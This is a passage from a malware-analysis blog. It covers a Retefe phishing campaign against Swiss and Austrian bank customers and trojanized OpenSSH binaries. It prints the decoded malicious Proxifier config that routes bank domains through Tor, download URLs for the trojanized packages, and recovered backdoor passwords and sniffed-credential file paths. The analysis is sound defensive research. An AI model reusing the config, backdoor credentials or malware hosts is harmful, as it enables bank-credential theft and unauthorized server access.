Rpb25Qb3J0YWJsZUVuZ2luZSBzdWJzeXN0ZW09IjY0Ij4NCiAgICAgIDxMb2NhdGlvbj5CYXNlUHJvdmlkZXI8L0xvY2F0aW9uPg0KICAgICAgPFR5cGUgaG90cGF0Y2g9ImZhbHNlIj5Qcm9sb2d1ZTwvVHlwZT4NCiAgICA8L1Byb3hpZmljYXRpb25Qb3J0YWJsZUVuZ2luZT4NCiAgICA8RW5jcnlwdGlvbiBtb2RlPSJiYXNpYyIgLz4NCiAgICA8SHR0cFByb3hpZXNTdXBwb3J0IGVuYWJsZWQ9ImZhbHNlIiAvPg0KICAgIDxIYW5kbGVEaXJlY3RDb25uZWN0aW9ucyBlbmFibGVkPSJmYWxzZSIgLz4NCiAgICA8Q29ubmVjdGlvbkxvb3BEZXRlY3Rpb24gZW5hYmxlZD0idHJ1ZSIgLz4NCiAgICA8UHJvY2Vzc1NlcnZpY2VzIGVuYWJsZWQ9ImZhbHNlIiAvPg0KICAgIDxQcm9jZXNzT3RoZXJVc2VycyBlbmFibGVkPSJmYWxzZSIgLz4NCiAgPC9PcHRpb25zPg0KICA8UHJveHlMaXN0Pg0KICAgIDxQcm94eSBpZD0iMTAwIiB0eXBlPSJTT0NLUzUiPg0KICAgICAgPEFkZHJlc3M+MTI3LjAuMC4xPC9BZGRyZXNzPg0KICAgICAgPFBvcnQ+OTA1MDwvUG9ydD4NCiAgICAgIDxPcHRpb25zPjQ4PC9PcHRpb25zPg0KICAgIDwvUHJveHk+DQogIDwvUHJveHlMaXN0Pg0KICA8Q2hhaW5MaXN0IC8+DQogIDxSdWxlTGlzdD4NCiAgICA8UnVsZSBlbmFibGVkPSJ0cnVlIj4NCiAgICAgIDxOYW1lPkxvY2FsaG9zdDwvTmFtZT4NCiAgICAgIDxUYXJnZXRzPmxvY2FsaG9zdDsgMTI3LjAuMC4xOyAlQ29tcHV0ZXJOYW1lJTsgYXBpLmlwaWZ5Lm9yZzwvVGFyZ2V0cz4NCiAgICAgIDxBY3Rpb24gdHlwZT0iRGlyZWN0IiAvPg0KICAgIDwvUnVsZT4NCiAgICA8UnVsZSBlbmFibGVkPSJ0cnVlIj4NCiAgICAgIDxOYW1lPnNvZnQ8L05hbWU+DQogICAgICA8QXBwbGljYXRpb25zPmZpcmVmb3guZXhlO2lleHBsb3JlLmV4ZTtjaHJvbWUuZXhlPC9BcHBsaWNhdGlvbnM+DQogICAgICA8VGFyZ2V0cz4qcG9zdGZpbmFuY2UuY2g7Y3MuZGlyZWN0bmV0LmNvbTtlYi5ha2IuY2g7Ki51YnMuY29tO3RiLnJhaWZmZWlzZW5kaXJlY3QuY2g7Ki5ia2IuY2g7Ki5sdWtiLmNoOyouemtiLmNoOyoub25iYS5jaDtlLWJhbmtpbmcuZ2tiLmNoOyouYmVrYi5jaDt3d3dzZWMuZWJhbmtpbmcuenVnZXJrYi5jaDtuZXRiYW5raW5nLmJjZ2UuY2g7Ki5yYWlmZmVpc2VuLmNoOyouY3JlZGl0LXN1aXNzZS5jb207Ki5iYW5rYXVzdHJpYS5hdDsqLmJhd2FncHNrLmNvbTsqLnJhaWZmZWlzZW4uYXQ7Ki5zdGF0aWMtdWJzLmNvbTsqLmJhd2FnLmNvbTsqLmNsaWVudGlzLmNoO2NsaWVudGlzLmNoOypiY3ZzLmNoOypjaWMuY2g7d3d3LmJhbmtpbmcuY28uYXQ7Km9iZXJiYW5rLmF0O3d3dy5vYmVyYmFuay1iYW5raW5nLmF0OypiYWxvaXNlLmNoOyoudWtiLmNoO3Vya2IuY2g7Ki51cmtiLmNoOyouZWVrLmNoOypzemtiLmNoOypzaGtiLmNoOypnbGtiLmNoOypua2IuY2g7Km93a2IuY2g7KmNhc2guY2g7KmJjZi5jaDsqLmVhc3liYW5rLmF0O2ViYW5raW5nLnJhaWZmZWlzZW4uY2g7Ki5vbmlvbjsqYmN2LmNoOypqdWxpdXNiYWVyLmNvbTsqYWJzLmNoOypiY24uY2g7KmJsa2IuY2g7KmJjai5jaDsqenVlcmNoZXJsYW5kYmFuay5jaDsqdmFsaWFudC5jaDsqd2lyLmNoPC9UYXJnZXRzPg0KICAgICAgPEFjdGlvbiB0eXBlPSJQcm94eSI+MTAwPC9BY3Rpb24+DQogICAgPC9SdWxlPg0KICAgIDxSdWxlIGVuYWJsZWQ9InRydWUiPg0KICAgICAgPE5hbWU+RGVmYXVsdDwvTmFtZT4NCiAgICAgIDxBY3Rpb24gdHlwZT0iRGlyZWN0IiAvPg0KICAgIDwvUnVsZT4NCiAgPC9SdWxlTGlzdD4NCjwvUHJveGlmaWVyUHJvZmlsZT4="  | base64 --decode
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<ProxifierProfile version="101" platform="Windows" product_id="1" product_minver="310">
  <Options>
    <Resolve>
      <AutoModeDetection enabled="false" />
      <ViaProxy enabled="true">
        <TryLocalDnsFirst enabled="false" />
      </ViaProxy>
      <ExclusionList>%ComputerName%; localhost; *.local</ExclusionList>
    </Resolve>
    <ProxificationPortableEngine subsystem="32">
      <Location>BaseProvider</Location>
      <Type hotpatch="true">Prologue</Type>
    </ProxificationPortableEngine>
    <ProxificationPortableEngine subsystem="64">
      <Location>BaseProvider</Location>
      <Type hotpatch="false">Prologue</Type>
    </ProxificationPortableEngine>
    <Encryption mode="basic" />
    <HttpProxiesSupport enabled="false" />
    <HandleDirectConnections enabled="false" />
    <ConnectionLoopDetection enabled="true" />
    <ProcessServices enabled="false" />
    <ProcessOtherUsers enabled="false" />
  </Options>
  <ProxyList>
    <Proxy id="100" type="SOCKS5">
      <Address>127.0.0.1</Address>
      <Port>9050</Port>
      <Options>48</Options>
    </Proxy>
  </ProxyList>
  <ChainList />
  <RuleList>
    <Rule enabled="true">
      <Name>Localhost</Name>
      <Targets>localhost; 127.0.0.1; %ComputerName%; api.ipify.org</Targets>
      <Action type="Direct" />
    </Rule>
    <Rule enabled="true">
      <Name>soft</Name>
      <Applications>firefox.exe;iexplore.exe;chrome.exe</Applications>
      <Targets>*postfinance.ch;cs.directnet.com;eb.akb.ch;*.ubs.com;tb.raiffeisendirect.ch;*.bkb.ch;*.lukb.ch;*.zkb.ch;*.onba.ch;e-banking.gkb.ch;*.bekb.ch;wwwsec.ebanking.zugerkb.ch;netbanking.bcge.ch;*.raiffeisen.ch;*.credit-suisse.com;*.bankaustria.at;*.bawagpsk.com;*.raiffeisen.at;*.static-ubs.com;*.bawag.com;*.clientis.ch;clientis.ch;*bcvs.ch;*cic.ch;www.banking.co.at;*oberbank.at;www.oberbank-banking.at;*baloise.ch;*.ukb.ch;urkb.ch;*.urkb.ch;*.eek.ch;*szkb.ch;*shkb.ch;*glkb.ch;*nkb.ch;*owkb.ch;*cash.ch;*bcf.ch;*.easybank.at;ebanking.raiffeisen.ch;*.onion;*bcv.ch;*juliusbaer.com;*abs.ch;*bcn.ch;*blkb.ch;*bcj.ch;*zuercherlandbank.ch;*valiant.ch;*wir.ch</Targets>
      <Action type="Proxy">100</Action>
    </Rule>
    <Rule enabled="true">
      <Name>Default</Name>
      <Action type="Direct" />
    </Rule>
  </RuleList>
</ProxifierProfile>


So in essence, and answering my own question, the configuration of the proxy is not downloaded anywhere, but just hardcoded 


and obfuscated in the code.
Publicado por
Etiquetas: , ,

Wednesday, October 12, 2016

Malicious email campaign mimicking Swiss Financial Institutions: Retefe again.

Yesterday, while I was investigating something else I ended up with some malicious email impersonating a Swiss bank.  

 The email with the subject "Von Ihrem Konto ist 78 Franken abgebucht" contains a 'docx' file named  "Credit_Zahlung.docx". Looking deeper, I  found quite a few more emails sent around the same time but with different attachments names and subjects, but all of them on behalf of the same Swiss Financial Institution.

 The 'docx' file contains an embedded image with a text message inviting to double click in order to see the invoice.




Looking to the file with oledump.py, in Remnux, I see some obfuscated .JS script code inside the DOCX file





I did not deobfuscated the .JS script code, however when I executed the code I saw that several applications were installed and executed. One of them is a Proxy tool (Proxifier) and the other is a Tor client.


The proxy tool is setup to forward all the traffic to some specific URLs through a localhost connection, which in reality is the Tor connection established. The set of URL that goes through the Tor connection are many Swiss banks and Austrian banks. This is how Retefe malware operates to steal the username/passwords of the customers. Luis Rocha explained it some months ago in his blog.




The list of domains affected are

 *postfinance.ch
cs.directnet.com
eb.akb.ch
*.ubs.com
tb.raiffeisendirect.ch
*.bkb.ch
*.lukb.ch
*.zkb.ch
*.onba.ch
e-banking.gkb.ch
*.bekb.ch
wwwsec.ebanking.zugerkb.ch
netbanking.bcge.ch
*.raiffeisen.ch
*.credit-suisse.com
*.bankaustria.at
*.bawagpsk.com
*.raiffeisen.at
*.static-ubs.com
*.bawag.com
*.clientis.ch
clientis.ch
*bcvs.ch
*cic.ch
www.banking.co.at
*oberbank.at
www.oberbank-banking.at
*baloise.ch
*.ukb.ch
urkb.ch
*.urkb.ch
*.eek.ch
*szkb.ch
*shkb.ch
*glkb.ch
*nkb.ch
*owkb.ch
*cash.ch
*bcf.ch
*.easybank.at
ebanking.raiffeisen.ch
*.onion
*bcv.ch
*juliusbaer.com
*abs.ch
*bcn.ch
*blkb.ch
*bcj.ch
*zuercherlandbank.ch


Proxifier is able to redirect the traffic for Internet Explorer, Firefox and Chrome. In the screenshot below there is connection by Chrome redirected through the proxy to an Onion URL  http://v7yxqrahkza3ewuv.onion



Looking to the HTTPS certificate we can see that the CA is Comodo, however this is totally a fake certificate which has been imported during the infection to fool the user and avoid the browser warnings.


Actually, for that specific domain the original certificate has been signed by Symantec CA.





Finally, the mimic website requests to introduce the phone number in order to install a maliciuos APK and be able to retrieve the 2FA token.

About this malicious APK I wrote several posts:

http://blog.angelalonso.es/2016/01/2nd-part-of-timba-malware-analysis-apk.html
http://blog.angelalonso.es/2015/10/android-memory-analysis-preparing.html
http://blog.angelalonso.es/2015/10/decrypting-emmental-blowfish-and-base64.html
http://blog.angelalonso.es/2015/10/android-memory-analysis-iii-analyzing.html
http://blog.angelalonso.es/2015/10/malware-analysis-with-androguad.html
http://blog.angelalonso.es/2015/10/reversing-c2c-http-emmental.html
http://blog.angelalonso.es/2015/11/reversing-sms-c-protocol-of-emmental.html
http://blog.angelalonso.es/2015/10/android-memory-analysis-iii-analyzing.html


In essence the TTP from this Threat Actors has not changed that much. However the tool Proxifier  to redirect the traffic is something recently introduced.



Publicado por
Etiquetas: , ,

Monday, September 19, 2016

Anatomy of a Real Linux Intrusion Part II (B): OpenSSH trojanized toolkit - different backdoor passwords

This is a short post to add some additional information to previous post.

 The default backdoor password that I analysed from the trojanized OpenSSH source code (PRtestD) is different depending on the OS and the architecture. Also, I figured out that the file where all the 'sniffed' password are kept (default is /etc/X11/.pr) is different as well.

 As mentioned in my previous post there are 7 different trojanized packages for several OS / architectures:
  • armv6 (ARMv6): http://gopremium.mooo.com/.../auto/arm61.tgz
  • armv71(ARMv7): http://gopremium.mooo.com/.../auto/arm71.tgz
  • Vyos (x86): http://gopremium.mooo.com/.../auto/vyos.tgz
  • Vyos64 (x64): http://gopremium.mooo.com/.../auto/vyos64.tgz
  • edgeos (MIPS): http://gopremium.mooo.com/.../auto/edgeos.tgz
  • edgeos64 (MIPS 64bits): http://gopremium.mooo.com/.../auto/edgeos64.tgz
  • default (compile on demand):   http://gopremium.mooo.com/.../auto/default.tgz

All the packages (except the default) contains OpenSSH compiled binaries and I assumed the password was the same in all of them, but this is not the case. Let's take a look.

Using 'radare2' I disassembled the 'sym.auth_password'  function (where the backdoor password is located) across the different SSHD binaries.

ARMv7


This is the code:

 
; UNKNOWN XREF from 0x000ff39c (unk)
           0x00011100      684b           ldr r3, [pc, 0x1a0]         ; [0x112a4:4]=0x61260 obj.SECRETPW
           0x00011102      2f22           movs r2, 0x2f               ; '/'
           0x00011104      d6f80080       ldr.w r8, [r6]
           0x00011108      4ff0650e       mov.w lr, 0x65              ; 'e'
           0x0001110c      d4f80ca0       ldr.w sl, [r4, 0xc]
           0x00011110      4ff0310c       mov.w ip, 0x31              ; '1'
           0x00011114      9f70           strb r7, [r3, 2]
           ; UNKNOWN XREF from 0x0000ca44 (unk)
           0x00011116      0846           mov r0, r1
           0x00011118      5f71           strb r7, [r3, 5]
           0x0001111a      0d46           mov r5, r1
           ; UNKNOWN XREF from 0x000aefe8 (unk)
           0x0001111c      cdf81480       str.w r8, [sp + local_14h]
           0x00011120      1946           mov r1, r3
           0x00011122      83f803e0       strb.w lr, [r3, 3]
           0x00011126      4ff05008       mov.w r8, 0x50              ; 'P'
           0x0001112a      89f80270       strb.w r7, [sb, 2]
           0x0001112e      83f80080       strb.w r8, [r3]
           0x00011132      4ff05208       mov.w r8, 0x52              ; 'R'
           0x00011136      89f80820       strb.w r2, [sb, 8]
           0x0001113a      83f80180       strb.w r8, [r3, 1]
           0x0001113e      4ff07308       mov.w r8, 0x73              ; 's'
           0x00011142      89f807c0       strb.w ip, [sb, 7]
           0x00011146      83f80480       strb.w r8, [r3, 4]
           0x0001114a      4ff03008       mov.w r8, 0x30              ; '0'
           0x0001114e      89f80020       strb.w r2, [sb]
           0x00011152      83f80680       strb.w r8, [r3, 6]
           0x00011156      7023           movs r3, 0x70               ; 'p'

Following the assembly code, I can see the password is: PRtest0

ARMv6






 
; XREFS: CALL 0x0002566c
           0x00012358      f04f2de9       push {r4, r5, r6, r7, r8, sb, sl, fp, lr}
           0x0001235c      1cd04de2       sub sp, sp, 0x1c
           0x00012360      60829fe5       ldr r8, [pc, 0x260]         ; [0x125c8:4]=0x74d78 obj.__stack_chk_guard__GLIBC_2.4 LEA loc._d_135 ; "xM." @ 0x125c8
           0x00012364      60329fe5       ldr r3, [pc, 0x260]         ; [0x125cc:4]=0x79268 obj.SECRETPW
           0x00012368      60629fe5       ldr r6, [pc, 0x260]         ; [0x125d0:4]=0x79318 obj.ILOG
           0x0001236c      00a098e5       ldr sl, [r8]
           0x00012370      0040a0e1       mov r4, r0
           0x00012374      14a08de5       str sl, [sp + local_14h]
           0x00012378      50a0a0e3       mov sl, 0x50                ; 'P'
           0x0001237c      00a0c3e5       strb sl, [r3]
           0x00012380      52a0a0e3       mov sl, 0x52                ; 'R'
           0x00012384      01a0c3e5       strb sl, [r3, 1]
           0x00012388      73a0a0e3       mov sl, 0x73                ; 's'
           0x0001238c      74c0a0e3       mov ip, 0x74                ; 't'
           0x00012390      65e0a0e3       mov lr, 0x65                ; 'e'
           0x00012394      04a0c3e5       strb sl, [r3, 4]
           0x00012398      30a0a0e3       mov sl, 0x30                ; '0'
           0x0001239c      0c9094e5       ldr sb, [r4, 0xc]
           0x000123a0      0100a0e1       mov r0, r1
           0x000123a4      06a0c3e5       strb sl, [r3, 6]
           0x000123a8      02c0c3e5       strb ip, [r3, 2]
           0x000123ac      03e0c3e5       strb lr, [r3, 3]
           0x000123b0      05c0c3e5       strb ip, [r3, 5]
           0x000123b4      0150a0e1       mov r5, r1
           0x000123b8      0310a0e1       mov r1, r3
           0x000123bc      7030a0e3       mov r3, 0x70                ; 'p'
           0x000123c0      0a30c6e5       strb r3, [r6, 0xa]
           0x000123c4      6330a0e3       mov r3, 0x63                ; 'c'
           0x000123c8      0330c6e5       strb r3, [r6, 3]
           0x000123cc      5830a0e3       mov r3, 0x58                ; 'X'
           0x000123d0      0530c6e5       strb r3, [r6, 5]
           0x000123d4      0030a0e3       mov r3, 0
           0x000123d8      0c30c6e5       strb r3, [r6, 0xc]
           0x000123dc      2e30a0e3       mov r3, 0x2e                ; '.'
           0x000123e0      2f20a0e3       mov r2, 0x2f                ; section_end..ARM.attributes
           0x000123e4      3170a0e3       mov r7, 0x31                ; '1'
           0x000123e8      0930c6e5       strb r3, [r6, 9]
           0x000123ec      7230a0e3       mov r3, 0x72                ; 'r'
           0x000123f0      0820c6e5       strb r2, [r6, 8]
           0x000123f4      0770c6e5       strb r7, [r6, 7]
           0x000123f8      0020c6e5       strb r2, [r6]
           0x000123fc      0670c6e5       strb r7, [r6, 6]


The password is the same than for ARMv6: PRtest0

vyos




 

 ; CALL XREF from 0x080664dc (sym.mm_answer_authpassword)
           0x08051f60      83ec5c         sub esp, 0x5c
           0x08051f63      895c244c       mov dword [esp + local_4ch], ebx
           0x08051f67      8b5c2460       mov ebx, dword [esp + local_60h] ; [0x60:4]=0x8048134 section.INTERP ; '`' ; "4...."
           0x08051f6b      89742450       mov dword [esp + local_50h], esi
           0x08051f6f      8b742464       mov esi, dword [esp + local_64h] ; [0x64:4]=19 ; 'd'
           0x08051f73      897c2454       mov dword [esp + local_54h], edi
           0x08051f77      896c2458       mov dword [esp + local_58h], ebp
           0x08051f7b      8b7b0c         mov edi, dword [ebx + 0xc]  ; [0xc:4]=0
           0x08051f7e      8b6b28         mov ebp, dword [ebx + 0x28] ; [0x28:4]=0x200034 ; '(' ; "4"
           0x08051f81      c7442404d0c1.  mov dword [esp + local_4h], obj.SECRETPW ; [0x80bc1d0:4]=0x1930100 LEA obj.SECRETPW ; obj.SECRETPW
           0x08051f89      893424         mov dword [esp], esi
           0x08051f8c      65a114000000   mov eax, dword gs:[0x14]    ; [0x14:4]=1
           0x08051f92      8944243c       mov dword [esp + local_3ch], eax
           0x08051f96      31c0           xor eax, eax
           0x08051f98      c605d0c10b08.  mov byte [obj.SECRETPW], 0x47 ; [0x80bc1d0:1]=0 LEA obj.SECRETPW ; obj.SECRETPW
           0x08051f9f      c605d1c10b08.  mov byte [0x80bc1d1], 0x5a  ; [0x80bc1d1:1]=1
           0x08051fa6      c605d2c10b08.  mov byte [0x80bc1d2], 0x6d  ; [0x80bc1d2:1]=147
           0x08051fad      c605d3c10b08.  mov byte [0x80bc1d3], 0x37  ; [0x80bc1d3:1]=1
           0x08051fb4      c605d4c10b08.  mov byte [0x80bc1d4], 0x48  ; [0x80bc1d4:1]=116
           0x08051fbb      c605d5c10b08.  mov byte [0x80bc1d5], 0x46  ; [0x80bc1d5:1]=0
           0x08051fc2      c605d6c10b08.  mov byte [0x80bc1d6], 0     ; [0x80bc1d6:1]=0
           0x08051fc9      c605a7c20b08.  mov byte [0x80bc2a7], 0x70  ; [0x80bc2a7:1]=2
           0x08051fd0      c605a0c20b08.  mov byte [0x80bc2a0], 0x63  ; [0x80bc2a0:1]=36
           0x08051fd7      c605a5c20b08.  mov byte [0x80bc2a5], 0x2f  ; [0x80bc2a5:1]=1
           0x08051fde      c605a4c20b08.  mov byte [0x80bc2a4], 0x73  ; [0x80bc2a4:1]=0
           0x08051fe5      c6059dc20b08.  mov byte [obj.ILOG], 0x2f   ; [0x80bc29d:1]=58 LEA obj.ILOG ; ":" @ 0x80bc29d
           0x08051fec      c605a3c20b08.  mov byte [0x80bc2a3], 0x70  ; [0x80bc2a3:1]=0
           0x08051ff3      c6059ec20b08.  mov byte [0x80bc29e], 0x65  ; [0x80bc29e:1]=0
           0x08051ffa      c605a2c20b08.  mov byte [0x80bc2a2], 0x6c  ; [0x80bc2a2:1]=29
           0x08052001      c6059fc20b08.  mov byte [0x80bc29f], 0x74  ; [0x80bc29f:1]=0
           0x08052008      c605a9c20b08.  mov byte [0x80bc2a9], 0     ; [0x80bc2a9:1]=1
           0x0805200f      c605a1c20b08.  mov byte [0x80bc2a1], 0x2f  ; [0x80bc2a1:1]=8
           0x08052016      c605a6c20b08.  mov byte [0x80bc2a6], 0x6c  ; [0x80bc2a6:1]=75
           0x0805201d      c605a8c20b08.  mov byte [0x80bc2a8], 0x73  ; [0x80bc2a8:1]=1
           0x08052024      e8e7b3ffff     call sym.imp.strcmp
           0x08052029      85c0           test eax, eax
       ┌─< 0x0805202b      7533           jne 0x8052060
          0x0805202d      c70594900b08.  mov dword [obj.secret_ok], 1 ; [0x80b9094:4]=0x841c60d LEA obj.secret_ok ; obj.secret_ok
          0x08052037      b001           mov al, 1
          ; JMP XREF from 0x0805213b (sym.auth_password)
          ; JMP XREF from 0x08052112 (sym.auth_password)
     ┌┌──> 0x08052039      8b54243c       mov edx, dword [esp + local_3ch] ; [0x3c:4]=0x8048034 section_end.ehdr ; '<' ; "4...4..."
     │││   0x0805203d      653315140000.  xor edx, dword gs:[0x14]
    ┌────< 0x08052044      0f8576010000   jne 0x80521c0
    ││││   0x0805204a      8b5c244c       mov ebx, dword [esp + local_4ch] ; [0x4c:4]=5 ; 'L'
    ││││   0x0805204e      8b742450       mov esi, dword [esp + local_50h] ; [0x50:4]=4 ; 'P'
    ││││   0x08052052      8b7c2454       mov edi, dword [esp + local_54h] ; [0x54:4]=3 ; 'T'
    ││││   0x08052056      8b6c2458       mov ebp, dword [esp + local_58h] ; [0x58:4]=308 ; 'X' ; "4."
    ││││   0x0805205a      83c45c         add esp, 0x5c
    ││││   0x0805205d      c3             ret
     ││││   0x0805205e      6690           nop


In this case the password is GZm7HF, but also the file is different '/etc/lps/lps'

 
 Python 2.7.12 (default, Jun 29 2016, 14:05:02)
[GCC 4.2.1 Compatible Apple LLVM 7.3.0 (clang-703.0.31)] on darwin
Type "help", "copyright", "credits" or "license" for more information.
>>> "475a6d374846".decode("hex")
'GZm7HF'
>>> "2f6574632f6c70732f6c7073".decode("hex")
'/etc/lps/lps'
>>>


vyos64






            0x0040ba00      48896c24e0     mov qword [rsp - 0x20], rbp
           0x0040ba05      4889f5         mov rbp, rsi
           0x0040ba08      48895c24d8     mov qword [rsp - 0x28], rbx
           0x0040ba0d      4c896424e8     mov qword [rsp - 0x18], r12
           0x0040ba12      4c896c24f0     mov qword [rsp - 0x10], r13
           0x0040ba17      4889fb         mov rbx, rdi
           0x0040ba1a      4c897424f8     mov qword [rsp - 8], r14
           0x0040ba1f      be108b6700     mov esi, obj.SECRETPW       ; obj.SECRETPW
           0x0040ba24      4883ec38       sub rsp, 0x38
           0x0040ba28      448b670c       mov r12d, dword [rdi + 0xc] ; [0xc:4]=0
           0x0040ba2c      4c8b6f30       mov r13, qword [rdi + 0x30] ; [0x30:8]=0x38004000000000 ; '0'
           0x0040ba30      4889ef         mov rdi, rbp
           0x0040ba33      64488b042528.  mov rax, qword fs:[0x28]    ; [0x28:8]=0x200470 ; '('
           0x0040ba3c      4889442408     mov qword [rsp + local_8h], rax
           0x0040ba41      31c0           xor eax, eax
           0x0040ba43      c605c6d02600.  mov byte [rip + 0x26d0c6], 0x47 ; [0x678b10:1]=178 LEA obj.SECRETPW ; obj.SECRETPW
           0x0040ba4a      c605c0d02600.  mov byte [rip + 0x26d0c0], 0x5a ; [0x678b11:1]=122
           0x0040ba51      c605bad02600.  mov byte [rip + 0x26d0ba], 0x6d ; [0x678b12:1]=64
           0x0040ba58      c605b4d02600.  mov byte [rip + 0x26d0b4], 0x37 ; [0x678b13:1]=0
           0x0040ba5f      c605aed02600.  mov byte [rip + 0x26d0ae], 0x48 ; [0x678b14:1]=0
           0x0040ba66      c605a8d02600.  mov byte [rip + 0x26d0a8], 0x46 ; [0x678b15:1]=0
           0x0040ba6d      c605a2d02600.  mov byte [rip + 0x26d0a2], 0 ; [0x678b16:1]=0
           0x0040ba74      c60574d12600.  mov byte [rip + 0x26d174], 0x70 ; [0x678bef:1]=0
           0x0040ba7b      c60566d12600.  mov byte [rip + 0x26d166], 0x63 ; [0x678be8:1]=165
           0x0040ba82      c60564d12600.  mov byte [rip + 0x26d164], 0x2f ; [0x678bed:1]=102
           0x0040ba89      c6055cd12600.  mov byte [rip + 0x26d15c], 0x73 ; [0x678bec:1]=10
           0x0040ba90      c6054ed12600.  mov byte [rip + 0x26d14e], 0x2f ; [0x678be5:1]=0 LEA obj.ILOG ; obj.ILOG
           0x0040ba97      c6054dd12600.  mov byte [rip + 0x26d14d], 0x70 ; [0x678beb:1]=0
           0x0040ba9e      c60541d12600.  mov byte [rip + 0x26d141], 0x65 ; [0x678be6:1]=0
           0x0040baa5      c6053ed12600.  mov byte [rip + 0x26d13e], 0x6c ; [0x678bea:1]=0
           0x0040baac      c60534d12600.  mov byte [rip + 0x26d134], 0x74 ; [0x678be7:1]=0
           0x0040bab3      c60537d12600.  mov byte [rip + 0x26d137], 0 ; [0x678bf1:1]=1
           0x0040baba      c60528d12600.  mov byte [rip + 0x26d128], 0x2f ; [0x678be9:1]=124
           0x0040bac1      c60526d12600.  mov byte [rip + 0x26d126], 0x6c ; [0x678bee:1]=0
           0x0040bac8      c60521d12600.  mov byte [rip + 0x26d121], 0x73 ; [0x678bf0:1]=54
           0x0040bacf      e86cb4ffff     call sym.imp.strcmp
           0x0040bad4      85c0           test eax, eax
       ┌─< 0x0040bad6      7548           jne 0x40bb20
          0x0040bad8      c70586722600.  mov dword [rip + 0x267286], 1 ; [0x672d68:4]=0x784 LEA obj.secret_ok ; obj.secret_ok
          0x0040bae2      b001           mov al, 1
          ; JMP XREF from 0x0040bbec (sym.userauth_none)
          ; JMP XREF from 0x0040bbc5 (sym.userauth_none)
     ┌┌──> 0x0040bae4      488b542408     mov rdx, qword [rsp + local_8h] ; [0x8:8]=0
     │││   0x0040bae9      644833142528.  xor rdx, qword fs:[0x28]
    ┌────< 0x0040baf2      0f8578010000   jne 0x40bc70
    ││││   0x0040baf8      488b5c2410     mov rbx, qword [rsp + local_10h] ; [0x10:8]=0x1003e0002
    ││││   0x0040bafd      488b6c2418     mov rbp, qword [rsp + local_18h] ; [0x18:8]=0x40a234 sym._start
    ││││   0x0040bb02      4c8b642420     mov r12, qword [rsp + local_20h] ; [0x20:8]=64 ; "@" 0x00000020
    ││││   0x0040bb07      4c8b6c2428     mov r13, qword [rsp + local_28h] ; [0x28:8]=0x200470 ; '('
    ││││   0x0040bb0c      4c8b742430     mov r14, qword [rsp + local_30h] ; [0x30:8]=0x38004000000000 ; '0'
    ││││   0x0040bb11      4883c438       add rsp, 0x38


In this case the password is GZm7HF also. The file is  '/etc/lps/lps' as well

edgeos (MIPS)


 



│││      ; XREFS: CALL 0x0040b7fc  CALL 0x00425314  CALL 0x0040bacc  CALL 0x004249ec  CALL 0x00424c24  CALL 0x00425030
 ││││      ; XREFS: CALL 0x0040ba10  CALL 0x0040b9e0  CALL 0x0040baac  CALL 0x0041eb28
 ────────> 0x0040a224      b0ffbd27       addiu sp, sp, -0x50
 ││││      0x0040a228      3800b2af       sw s2, 0x38(sp)
 ││││      0x0040a22c      4800123c       lui s2, 0x48
 ││││      0x0040a230      00a04b8e       lw t3, -0x6000(s2)
 ││││      0x0040a234      48000a3c       lui t2, 0x48
 ││││      0x0040a238      2c00abaf       sw t3, 0x2c(sp)
 ││││      0x0040a23c      47000b24       addiu t3, zero, 0x47
 ││││      0x0040a240      b89f4225       addiu v0, t2, -0x6048
 ││││      0x0040a244      b89f4ba1       sb t3, -0x6048(t2)
 ││││      0x0040a248      5a000a24       addiu t2, zero, 0x5a
 ││││      0x0040a24c      4800b6af       sw s6, 0x48(sp)
 ││││      0x0040a250      3c00b3af       sw s3, 0x3c(sp)
 ││││      0x0040a254      3400b1af       sw s1, 0x34(sp)
 ││││      0x0040a258      3000b0af       sw s0, 0x30(sp)
 ││││      0x0040a25c      4c00bfaf       sw ra, 0x4c(sp)
 ││││      0x0040a260      4400b5af       sw s5, 0x44(sp)
 ││││      0x0040a264      4000b4af       sw s4, 0x40(sp)
 ││││      0x0040a268      01004aa0       sb t2, 1(v0)
 ││││      0x0040a26c      6d000a24       addiu t2, zero, 0x6d
 ││││      0x0040a270      02004aa0       sb t2, 2(v0)
 ││││      0x0040a274      37000a24       addiu t2, zero, 0x37
 ││││      0x0040a278      03004aa0       sb t2, 3(v0)
 ││││      0x0040a27c      48000a24       addiu t2, zero, 0x48
 ││││      0x0040a280      4800093c       lui t1, 0x48
 ││││      0x0040a284      21808000       move s0, a0
 ││││      0x0040a288      04004aa0       sb t2, 4(v0)
 ││││      0x0040a28c      46000a24       addiu t2, zero, 0x46
 ││││      0x0040a290      0c00148e       lw s4, 0xc(s0)
 ││││      0x0040a294      48e83625       addiu s6, t1, -0x17b8
 ││││      0x0040a298      2120a000       move a0, a1
 ││││      0x0040a29c      05004aa0       sb t2, 5(v0)
 ││││      0x0040a2a0      060040a0       sb zero, 6(v0)
 ││││      0x0040a2a4      2188a000       move s1, a1
 ││││      0x0040a2a8      21284000       move a1, v0
 ││││      0x0040a2ac      63000224       addiu v0, zero, 0x63
 ││││      0x0040a2b0      0300c2a2       sb v0, 3(s6)
 ││││      0x0040a2b4      65000224       addiu v0, zero, 0x65
 ││││      0x0040a2b8      2f000324       addiu v1, zero, 0x2f
 ││││      0x0040a2bc      70000824       addiu t0, zero, 0x70
 ││││      0x0040a2c0      73000624       addiu a2, zero, 0x73
 ││││      0x0040a2c4      6c000724       addiu a3, zero, 0x6c
 ││││      0x0040a2c8      0100c2a2       sb v0, 1(s6)
 ││││      0x0040a2cc      74000224       addiu v0, zero, 0x74
 ││││      0x0040a2d0      0a00c8a2       sb t0, 0xa(s6)
 ││││      0x0040a2d4      0800c3a2       sb v1, 8(s6)
 ││││      0x0040a2d8      0700c6a2       sb a2, 7(s6)
 ││││      0x0040a2dc      0600c8a2       sb t0, 6(s6)
 ││││      0x0040a2e0      0500c7a2       sb a3, 5(s6)
 ││││      0x0040a2e4      0200c2a2       sb v0, 2(s6)
 ││││      0x0040a2e8      0c00c0a2       sb zero, 0xc(s6)
 ││││      0x0040a2ec      0400c3a2       sb v1, 4(s6)
 ││││      0x0040a2f0      0900c7a2       sb a3, 9(s6)
 ││││      0x0040a2f4      0b00c6a2       sb a2, 0xb(s6)
 ││││      0x0040a2f8      5015100c       jal fcn.00405540
 ││││      0x0040a2fc      48e823a1       sb v1, -0x17b8(t1)
 ────────< 0x0040a300      12004014       bnez v0, 0x40a34c
 ││││      0x0040a304      2800138e       lw s3, 0x28(s0)
 ││││      0x0040a308      4800023c       lui v0, 0x48
 ││││      0x0040a30c      01000324       addiu v1, zero, 1
 ││││      0x0040a310      ac9f43ac       sw v1, -0x6054(v0)
